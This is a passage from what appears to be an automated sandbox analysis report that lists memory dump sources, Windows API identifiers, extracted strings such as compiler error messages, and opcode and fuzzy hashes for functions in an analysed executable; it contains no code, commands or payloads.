                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$_get_daylight
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 72036449-0
                                                                                                                                                                              • Opcode ID: 1a8af62ed994a10ec80c821e5f9cdea4acab5972e665962b8409d89d375f43ad
                                                                                                                                                                              • Instruction ID: bc01d13e942b3fa2927267a7159d57160f2266be113c8550e71c4013136f553f
                                                                                                                                                                              • Opcode Fuzzy Hash: 1a8af62ed994a10ec80c821e5f9cdea4acab5972e665962b8409d89d375f43ad
                                                                                                                                                                              • Instruction Fuzzy Hash: 4451B136558E4086F7775EABD4453EA7AF0E34A7D4F198429BB058B2F7CA3CC840C682
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ForegroundVisible
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4078700383-0
                                                                                                                                                                              • Opcode ID: f47fe86f7b6576e3e5753954d4608bd3b4ad57a35ca61933a838e1685bbb9713
                                                                                                                                                                              • Instruction ID: 0ef08e73eb9029e34f07e8673293715da90fad3eb8bda0e84d18f2e24024eff4
                                                                                                                                                                              • Opcode Fuzzy Hash: f47fe86f7b6576e3e5753954d4608bd3b4ad57a35ca61933a838e1685bbb9713
                                                                                                                                                                              • Instruction Fuzzy Hash: 04417233A1878585FB769B12A4403EA76E4F79C7D0F484126FB8943BA5EF78C691C740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$Destroy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3525833831-0
                                                                                                                                                                              • Opcode ID: 5c4d4fe03b1a64b22552a404e94a1d53109b584db142505ca916920d0297fc4f
                                                                                                                                                                              • Instruction ID: a296680f873d5749fbddd9458267512cc696b1811ceba66c0286af223c4269a4
                                                                                                                                                                              • Opcode Fuzzy Hash: 5c4d4fe03b1a64b22552a404e94a1d53109b584db142505ca916920d0297fc4f
                                                                                                                                                                              • Instruction Fuzzy Hash: 6341E932305A4086EF969F27E5807E973B5EB58BD8F181027FB0E47AA5DF38C8919740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Time$CurrentDirectoryFileSystem
                                                                                                                                                                              • String ID: ErrorLevel
                                                                                                                                                                              • API String ID: 2903961910-220487136
                                                                                                                                                                              • Opcode ID: bf3e7281bc98a524b65ee43159819780f9900e4e02ce1937708de8e8c2e3beb3
                                                                                                                                                                              • Instruction ID: d799a42fd44c0b52998f00863b3f2f248d3bceb675abef24c70b76c30874e4f9
                                                                                                                                                                              • Opcode Fuzzy Hash: bf3e7281bc98a524b65ee43159819780f9900e4e02ce1937708de8e8c2e3beb3
                                                                                                                                                                              • Instruction Fuzzy Hash: 35615872214B4082EB529F27E9547DA33A4FB89FD8F481126EF894BBA9DF39C450C750
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                              • String ID: e+000$gfff
                                                                                                                                                                              • API String ID: 3215553584-3030954782
                                                                                                                                                                              • Opcode ID: eee5713d3ee3f5d484f8c11630cc5d48c8f9b302c68aad1caa58d75069734cbc
                                                                                                                                                                              • Instruction ID: 61c85c2c6a388eb6eb24f925c43f97f738af9f37ca4f5b0d4790cce32985ed39
                                                                                                                                                                              • Opcode Fuzzy Hash: eee5713d3ee3f5d484f8c11630cc5d48c8f9b302c68aad1caa58d75069734cbc
                                                                                                                                                                              • Instruction Fuzzy Hash: 21511976714BC086E7268F7699413D97BA1E395BD0F489225EB9447BEACB3CC445C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: A$Out of memory.
                                                                                                                                                                              • API String ID: 0-1278255009
                                                                                                                                                                              • Opcode ID: 79de0ec0ff0cfd64c15ce81a5147b610f61afac8aba6a8cb64f1e34740dda396
                                                                                                                                                                              • Instruction ID: 467dde4ddc3624f21e9693dd3dd692a826cd3876b3a1352550a69bceaf88c27b
                                                                                                                                                                              • Opcode Fuzzy Hash: 79de0ec0ff0cfd64c15ce81a5147b610f61afac8aba6a8cb64f1e34740dda396
                                                                                                                                                                              • Instruction Fuzzy Hash: E0511732205B4085EB66DF26E8503E973A5FB4CBD8F44412AEB8D47B74EF78C6918740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalLeaveSection
                                                                                                                                                                              • String ID: 0$Compile error %d at offset %d: %hs
                                                                                                                                                                              • API String ID: 3988221542-2351679343
                                                                                                                                                                              • Opcode ID: f1cba43113dfb8cb662bf1ade5c382bf9984ffa852038bffa325dd96ef33e444
                                                                                                                                                                              • Instruction ID: cecf33901bc5c3ac2b05b01cba4b1f47f5371c2d3e66ff0240e3e897add4e906
                                                                                                                                                                              • Opcode Fuzzy Hash: f1cba43113dfb8cb662bf1ade5c382bf9984ffa852038bffa325dd96ef33e444
                                                                                                                                                                              • Instruction Fuzzy Hash: 5431A036615A9082EB62CF12F0107DA77A0F78D7E8F544212FB5903BE9EB79C986C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalLeaveSection
                                                                                                                                                                              • String ID: 0$Compile error %d at offset %d: %hs
                                                                                                                                                                              • API String ID: 3988221542-2351679343
                                                                                                                                                                              • Opcode ID: 15b9bd6b379569076b28376e50680520561e4ba9db9d61f7f2a9b5df354b8ace
                                                                                                                                                                              • Instruction ID: 5cf4a493a0d421caa1bf01c45cc12b75b0351c9195f5b1dc52c4a7769694847d
                                                                                                                                                                              • Opcode Fuzzy Hash: 15b9bd6b379569076b28376e50680520561e4ba9db9d61f7f2a9b5df354b8ace
                                                                                                                                                                              • Instruction Fuzzy Hash: 01319F36619A8086DB62CB12F0543DA77A0F78D7E8F544212FB5943BA9DB7DC985CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileFullNameOperationPath
                                                                                                                                                                              • String ID: \
                                                                                                                                                                              • API String ID: 1380555793-2967466578
                                                                                                                                                                              • Opcode ID: e8bfbb057c76f10d7de97065186224da9732f09d4cb21bb8287e9045b5429000
                                                                                                                                                                              • Instruction ID: 3a65edeb419c4bfcf5a098fdd129620f60c82b9336cb9b1133669d397fc21ded
                                                                                                                                                                              • Opcode Fuzzy Hash: e8bfbb057c76f10d7de97065186224da9732f09d4cb21bb8287e9045b5429000
                                                                                                                                                                              • Instruction Fuzzy Hash: B931AF7291578086EB529B65E4503DA63B1EB997A0F585316F7AC43BF4EB7CC188CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Time$File$LocalSystem
                                                                                                                                                                              • String ID: %04d%02d%02d%02d%02d%02d
                                                                                                                                                                              • API String ID: 1748579591-4847443
                                                                                                                                                                              • Opcode ID: 5843e3882d1dcab57b6af56ecaa70eac69cf320e508c9690187eb711318d3b60
                                                                                                                                                                              • Instruction ID: 823b30e1757d1e32911a9709a266117f92b60f5366063b9bfb122c7045a96119
                                                                                                                                                                              • Opcode Fuzzy Hash: 5843e3882d1dcab57b6af56ecaa70eac69cf320e508c9690187eb711318d3b60
                                                                                                                                                                              • Instruction Fuzzy Hash: D8316D7361869586E765CF16E0503AEB7B1F388BE0F144216EBAA43AE8DB39C550DB10
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ItemMenu$CountInsert
                                                                                                                                                                              • String ID: P
                                                                                                                                                                              • API String ID: 3891021626-3110715001
                                                                                                                                                                              • Opcode ID: 42ccc81ab47dda8e90b4e0dbdc95a82c3cf01d8a6a9546156e60b59b82302db0
                                                                                                                                                                              • Instruction ID: 95c0ca7d048a15d5604144ae0ac4d03f7f2615036de139d27f9f6b0237f27d4e
                                                                                                                                                                              • Opcode Fuzzy Hash: 42ccc81ab47dda8e90b4e0dbdc95a82c3cf01d8a6a9546156e60b59b82302db0
                                                                                                                                                                              • Instruction Fuzzy Hash: B0214B76718B4086E765CF16E440B5A77A0F78CBD4F144265EFAD83B64DB38C991CB40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: KeyboardLayout$CharUpper_invalid_parameter_noinfo
                                                                                                                                                                              • String ID: Up$MZ@
                                                                                                                                                                              • API String ID: 991500651-2530889181
                                                                                                                                                                              • Opcode ID: 697b1ddf391089b84ab6e29162d92631a95ca3f16c5f7ede29f4cba60a95f2f1
                                                                                                                                                                              • Instruction ID: 0f0724e6aa44e10c27b577b4b3187c41486d87ce5aec6bf742ebd7696531e053
                                                                                                                                                                              • Opcode Fuzzy Hash: 697b1ddf391089b84ab6e29162d92631a95ca3f16c5f7ede29f4cba60a95f2f1
                                                                                                                                                                              • Instruction Fuzzy Hash: 2321A1326086918AF7269B26A4147FE3BB0F70E7D8F098111FB95877E5DB3AC181C751
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalLeaveSection
                                                                                                                                                                              • String ID: 0$Compile error %d at offset %d: %hs
                                                                                                                                                                              • API String ID: 3988221542-2351679343
                                                                                                                                                                              • Opcode ID: de48dedb2d8f64697cf96937d6efe2c2a0ea9c1dc5e32183bc192979a8df80c2
                                                                                                                                                                              • Instruction ID: 382487860e0010923ce80037c4cfabb39c287060218e3f9e4300a95374c8fd35
                                                                                                                                                                              • Opcode Fuzzy Hash: de48dedb2d8f64697cf96937d6efe2c2a0ea9c1dc5e32183bc192979a8df80c2
                                                                                                                                                                              • Instruction Fuzzy Hash: 51218032615A9082EB62CF12F0547DA77A0F78D7E8F544212FB6943BA9DB7DC985CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalLeaveSection
                                                                                                                                                                              • String ID: 0$Compile error %d at offset %d: %hs
                                                                                                                                                                              • API String ID: 3988221542-2351679343
                                                                                                                                                                              • Opcode ID: 09098bda75351ba7dba76ee1c92df32a132018686c4c09a2cd074ed0c52e59ed
                                                                                                                                                                              • Instruction ID: b0cbe2999384d7fcca08c60d9691201fc42142856bf261effc23cabb44b8de1f
                                                                                                                                                                              • Opcode Fuzzy Hash: 09098bda75351ba7dba76ee1c92df32a132018686c4c09a2cd074ed0c52e59ed
                                                                                                                                                                              • Instruction Fuzzy Hash: CB21A032615A9082EB62CF12F0007DA77A0F78C7E8F544212FB6943BA9DB7DC985CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalLeaveSection
                                                                                                                                                                              • String ID: 0$Compile error %d at offset %d: %hs
                                                                                                                                                                              • API String ID: 3988221542-2351679343
                                                                                                                                                                              • Opcode ID: ddc1193f9d68e82286e7111d3aa5933917d60497afe9eb3252a7273c93d758cb
                                                                                                                                                                              • Instruction ID: ac248a79933f7ed667a01fc0cc5b6e2c4e91191defc3f090282e21e2918ee102
                                                                                                                                                                              • Opcode Fuzzy Hash: ddc1193f9d68e82286e7111d3aa5933917d60497afe9eb3252a7273c93d758cb
                                                                                                                                                                              • Instruction Fuzzy Hash: 59318D36615A9082EB62CF12E0047DA77A0F74C7E8F544212FB9943BA9EB79C985CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ChangeTypeVariant
                                                                                                                                                                              • String ID: MZ@
                                                                                                                                                                              • API String ID: 4220676616-2978689999
                                                                                                                                                                              • Opcode ID: 30e0cf0a4c9115540636613ea16c2a44b881968d220bd31c04d0a0c5dbb11a6f
                                                                                                                                                                              • Instruction ID: 92b591d3be54bcd71e1f4f04b012b2babcae1167d48a11ea441402cbf69973ae
                                                                                                                                                                              • Opcode Fuzzy Hash: 30e0cf0a4c9115540636613ea16c2a44b881968d220bd31c04d0a0c5dbb11a6f
                                                                                                                                                                              • Instruction Fuzzy Hash: 3A217F73214B1082E3158F16F4507AE77A1FB88BD8F459125FB8D47BA4EB38C590CB44
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
